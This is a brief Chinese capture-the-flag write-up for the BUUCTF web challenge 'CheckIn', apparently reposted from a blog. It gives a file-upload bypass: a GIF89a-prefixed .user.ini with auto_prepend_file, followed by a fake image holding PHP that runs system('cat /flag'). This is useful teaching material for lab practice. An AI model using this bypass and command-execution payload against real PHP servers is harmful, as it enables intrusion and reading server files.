buuctf-web CheckIn 1

打开页面,发现是一道上传文件的题

那我们先上传一个.user.ini文件

GIF89a
auto_prepend_file=a.jpg

然后再让一传一个a.jpg

GIF89a
<script language='php'>system('cat /flag')</script>

 在这里可以看到 uploads/33c6f8457bd77fce0b109b4554e1a95c对应的文件夹下面有两个文件,一个是.user.ini,还一个是a.jpg,当然,还有一个index.php

http://3ac398e0-f3ac-4fa5-941c-77d1c7c56889.node3.buuoj.cn/uploads/04b0951938d905b41348c1548f9c338b/index.php,输入这个链接直接得到flag

原文地址:https://www.cnblogs.com/awsole/p/13834536.html